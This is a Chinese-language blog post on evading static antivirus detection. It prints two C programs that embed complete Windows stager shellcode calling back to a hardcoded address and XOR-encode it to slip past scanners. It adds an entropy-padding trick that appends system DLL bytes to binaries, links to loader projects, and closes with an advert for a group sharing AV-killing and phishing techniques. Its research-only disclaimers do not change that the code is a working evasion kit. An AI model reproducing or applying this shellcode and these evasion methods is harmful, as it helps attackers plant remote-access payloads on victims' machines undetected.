【免杀思路】无视杀软扫描-静态篇

admin
admin
admin
141216
文章
117
评论
2025年5月1日01:19:05评论9 views字数 7096阅读23分39秒阅读模式
0x01 声明
本文所涉及的技术、思路和工具仅用于安全测试和防御研究,切勿将其用于非法入侵或攻击他人系统等目的,一切后果由使用者自行承担!!!
0x02 加密技术
异或加密
#include<stdio.h>#include<windows.h>//#pragma comment(linker,"/subsystem:"windows" /entry:"mainCRTStartup"")//不显示窗口#define KEY 0x54 #define WAF 0x41 #define DEF 0x49 #define OPQ 0x78#define UIT 0x91 unsigned char code[] ="xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8bx12xebx86x5dx68x6ex65x74x00x68x77x69x6ex69x54x68x4cx77x26x07xffxd5x31xffx57x57x57x57x57x68x3ax56x79xa7xffxd5xe9x84x00x00x00x5bx31xc9x51x51x6ax03x51x51x68x61x1ex00x00x53x50x68x57x89x9fxc6xffxd5xebx70x5bx31xd2x52x68x00x02x40x84x52x52x52x53x52x50x68xebx55x2ex3bxffxd5x89xc6x83xc3x50x31xffx57x57x6axffx53x56x68x2dx06x18x7bxffxd5x85xc0x0fx84xc3x01x00x00x31xffx85xf6x74x04x89xf9xebx09x68xaaxc5xe2x5dxffxd5x89xc1x68x45x21x5ex31xffxd5x31xffx57x6ax07x51x56x50x68xb7x57xe0x0bxffxd5xbfx00x2fx00x00x39xc7x74xb7x31xffxe9x91x01x00x00xe9xc9x01x00x00xe8x8bxffxffxffx2fx48x71x4fx54x00x5fx35xc1xb5x67xd7xc9x0bxdexf8xa2xa7x60x7fxbcx21xf1xe2x96xfex9cx1axc3xaex02x00xe0xdcx94x8axdbxf6xb4xbex56x04xb0xb3x21x48xc7xa9xb9x09xf8xbax7exd4x81x83x34x70x73xe8x7bx14x3cx8cx80x60x98x1ax32x0bxa5x20xccx2fx85x78x8fx02x43x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx35x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x39x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x36x2ex31x3bx20x57x4fx57x36x34x3bx20x54x72x69x64x65x6ex74x2fx35x2ex30x3bx20x4ex50x30""x39x3bx20x4ex50x30x39x3bx20x4dx41x41x55x29x0dx0ax00x85x2axa4x15x9dx9ex4cxe3x8cx5ex82xebxdcx72xc2xe0xbfx9ax8cx7cx4bxcex80xbfxc6x69x36xccxbaxe7xcfxd1x7bxf0x6bx3exd4x78xf5x4axcaxf4xb3xf8xe6xcaxdbxccx4dx8ex49xf2xacx80xebx54x59x73x62xa2x72x55x98x9bxd9x46xbcxe8xcfx62x60xabxedx3ex36x60xb1x79x8bx48x6ax1bxb3x42xcaxd4x88x6cx0fxfex5fx57x36x5ax09xdcx4fx52x50x30xc6xbfxd7x77xedxf8xb8xb2xcfx44x0dx4dx3dx83xc4x8cx76x99xb9x81x87x12x61x02x64x13xb0xcdx13x6dx20xccx93xcbxd1xc8xb1x4exb3x3bx89x72x08xfax4exfdx4ax42x8ex78xa6x33x0cx5fx2bx30xd8xa4x80x53x62x00x58x6ex63x97x4bx0dx84x25xa6x7fx44x88x43xaax93x30x2fx12x6bxd8xb0x75x1cx1ax75x96x0ex40xe4xcfxa0xe3x7dx8bx66x2bxe9x82x00x68xf0xb5xa2x56xffxd5x6ax40x68x00x10x00x00x68x00x00x40x00x57x68x58xa4x53xe5xffxd5x93xb9x00x00x00x00x01xd9x51x53x89xe7x57x68x00x20x00x00x53x56x68x12x96x89xe2xffxd5x85xc0x74xc6x8bx07x01xc3x85xc0x75xe5x58xc3xe8xa9xfdxffxffx31x39x32x2ex31x36x38x2ex32x30x34x2ex31x33x30x00x49x96x02xd2";int main(int argc, char* argv[]){char bufss[sizeof(code)] = { 0 };for (int i = 0; i < sizeof(code) - 1; i++) //for循环{bufss[i] = code[i] ^ KEY; //字符串与EKY进行异或printf("\x%x", bufss[i]); //输出异或后的结果}char buf[sizeof(code)] = { 0 };for (int s = 0; s < sizeof(bufss) - 1; s++){buf
展开收缩
 = bufss
展开收缩
 ^ KEY;printf("\x%x", buf
展开收缩
); //输出异或还原后的结果}char bufs[sizeof(code)] = { 0 };for (int x = 0; x < sizeof(bufss) - 1; x++){bufs[x] = buf[x] ^ DEF;//printf("\x%x", bufs[x]); //输出}return 0;}

InterlockedXor8函数异或加密

#include<Windows.h>#include<intrin.h>#include<WinBase.h>#include<stdio.h>unsigned char buf[] = "xfcx48x83xe4xf0xe8xc8x00x00x00x41x51x41x50x52x51x56x48x31xd2x65x48x8bx52x60x48x8bx52x18x48x8bx52x20x48x8bx72x50x48x0fxb7x4ax4ax4dx31xc9x48x31xc0xacx3cx61x7cx02x2cx20x41xc1xc9x0dx41x01xc1xe2xedx52x41x51x48x8bx52x20x8bx42x3cx48x01xd0x66x81x78x18x0bx02x75x72x8bx80x88x00x00x00x48x85xc0x74x67x48x01xd0x50x8bx48x18x44x8bx40x20x49x01xd0xe3x56x48xffxc9x41x8bx34x88x48x01xd6x4dx31xc9x48x31xc0xacx41xc1xc9x0dx41x01xc1x38xe0x75xf1x4cx03x4cx24x08x45x39xd1x75xd8x58x44x8bx40x24x49x01xd0x66x41x8bx0cx48x44x8bx40x1cx49x01xd0x41x8bx04x88x48x01xd0x41x58x41x58x5ex59x5ax41x58x41x59x41x5ax48x83xecx20x41x52xffxe0x58x41x59x5ax48x8bx12xe9x4fxffxffxffx5dx6ax00x49xbex77x69x6ex69x6ex65x74x00x41x56x49x89xe6x4cx89xf1x41xbax4cx77x26x07xffxd5x48x31xc9x48x31xd2x4dx31xc0x4dx31xc9x41x50x41x50x41xbax3ax56x79xa7xffxd5xebx73x5ax48x89xc1x41xb8x61x1ex00x00x4dx31xc9x41x51x41x51x6ax03x41x51x41xbax57x89x9fxc6xffxd5xebx59x5bx48x89xc1x48x31xd2x49x89xd8x4dx31xc9x52x68x00x02x40x84x52x52x41xbaxebx55x2ex3bxffxd5x48x89xc6x48x83xc3x50x6ax0ax5fx48x89xf1x48x89xdax49xc7xc0xffxffxffxffx4dx31xc9x52x52x41xbax2dx06x18x7bxffxd5x85xc0x0fx85x9dx01x00x00x48xffxcfx0fx84x8cx01x00x00xebxd3xe9xe4x01x00x00xe8xa2xffxffxffx2fx43x62x61x57x00x07x1fx6ex1exdbxd5x2axf7xf0x91x6ax22x54x67x4cxa1x1dx68xacxa8x95x98x23x72x2dx33xefxcbx20x0dx28x14xeex39x2ax9bxbex1bxabx78x7cx18x20x45xcdx64x1bx93xa0x50x5fxd6x00x97x91x50x09xaax08xdbx49x72x63x57x01x28x77x16x1bx05x13x1dxc6x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx34x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x37x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x35x2ex31x3bx20x54x72x69x64x65x6ex74x2fx34x2ex30x3bx20x2ex4ex45x54x20x43x4cx52x20x31x2ex31x2ex34x33x32x32x29x0dx0ax00x0bx2bx6fxb8x74x26x20x72x5cx7fxcax99x60xebx20x8fx46xd6x3bxdcx0axe5xe4xb6xe2x29xf5x85x97x5dx88x17x05xf5x8fx57xb9x21x0dxe8xb5x18x9bxe3xbax51x86x71xbdx18x52xedx5exedxd8x04x1cx74xa9xb2xebxcfx37x16x46xf3x7bxfbx44x79xbcx86xabx27x04xb7x47x99x9ex5fx49xc9xe0x09x92xc5xb8x44x59x45x4exeexaexabxd4xfdx60xc0x66x6cx8cx27xd6xa5x6ex04x20x83xcbxd2x2bxccx3ex35xf5x9dx73x86xa8x69xdfx67x9bxccxaexacx31x73x23x84x3ax7cxf7xa0xdexa9xc7x0fxecx64xf6x9fxadx57xd0xfaxa3x92xc7x9bxf4x69x53x97x54xabx2ex61xc7x09x6bx30x0cx44xdfx55xd9x2bx15x2ex85x7dx0fx5dx97x6dxccx3ax33x32xfcx12xd7x2dx59x8excaxaex88xcaxa8x94x5bxccxa4x12x00xa8x4dxf1x26x40x71x5cx16x0cx00x41xbexf0xb5xa2x56xffxd5x48x31xc9xbax00x00x40x00x41xb8x00x10x00x00x41xb9x40x00x00x00x41xbax58xa4x53xe5xffxd5x48x93x53x53x48x89xe7x48x89xf1x48x89xdax41xb8x00x20x00x00x49x89xf9x41xbax12x96x89xe2xffxd5x48x83xc4x20x85xc0x74xb6x66x8bx07x48x01xc3x85xc0x75xd7x58x58x58x48x05x00x00x00x00x50xc3xe8x9fxfdxffxffx31x39x32x2ex31x36x38x2ex32x30x34x2ex31x33x30x00x49x96x02xd2";intmain(){    DWORD codesize = sizeof(buf);for (int i = 0; i < codesize -0x1; i++){InterlockedXor8((char volatile*)buf + i, 0x1E);InterlockedXor8((char volatile*)buf + i, 0x89);printf("\x%x", buf[i]); //输出}}

我直接上优秀加密项目

https://github.com/Haunted-Banshee/Shellcode-Hastur/https://github.com/xf555er/ShellcodeEncryptionhttps://github.com/Maldev-Academy/EntropyReducerhttps://github.com/nickvourd/Supernovahttps://github.com/Techryptic/Pokemon-Shellcode-Loader

0x03 基于熵检测混淆

推荐工具:
https://www.softpedia.com/get/Programming/File-Editors/Helium-Hex-Editor.shtml
使用方式:
DLL:copy Dll1.dll Msimg32.dlltype c:WindowsSystem32kernel32.dll >> Msimg32.dllEXE:copy wa.exe bin.exetype c:WindowsSystem32kernel32.dll >> bin.exe能正常运行exe。
【免杀思路】无视杀软扫描-静态篇

点击这个圆检测

【免杀思路】无视杀软扫描-静态篇
0x04 推荐加密方式

推荐UUID、IPv4、IPv6、MAC、Xor、自写加密等,避免使用熵值过高的加密方式,就算使用也要套多层加密解决熵值问题。

0x05 红蓝偶像练习生小圈子

圈子主要研究方向红蓝对抗、钓鱼手法思路、武器化操作,红队工具二开与免杀。圈内不定期分享红队技术文章,攻防经验总结,学习笔记以及自研工具与插件。目前圈子已满100人,欢迎各位大佬进圈子交流学习。
圈子目前更新相关技术文章:
  • HeavenlyBypassAV内部版
  • HeavenlyX86内部版
  • 红队场景下lnk钓鱼Bypass国内AV
  • LNK钓鱼图标自适应制作
  • lnk钓鱼思路视频讲解
  • lnk钓鱼Bypass某擎
  • Kill360核晶
  • AV对抗-致盲AV(核晶)
  • kill火绒
  • 火绒6.0内存免杀
  • Defender分离免杀
  • HeavenlyProtectionCS内部CS插件
  • 捆绑免杀360
  • Fscan免杀核晶
  • QVM解决思路
  • 红队思路-钓鱼环境下小窗口截屏窃取
  • 免杀Todesk/向日葵读取工具
  • 还有更多红队思路文章!期待您的加入!!!
【免杀思路】无视杀软扫描-静态篇
【免杀思路】无视杀软扫描-静态篇
【免杀思路】无视杀软扫描-静态篇

原文始发于微信公众号(安全天书):【免杀思路】无视杀软扫描-静态篇

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月1日01:19:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【免杀思路】无视杀软扫描-静态篇https://cn-sec.com/archives/4021330.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息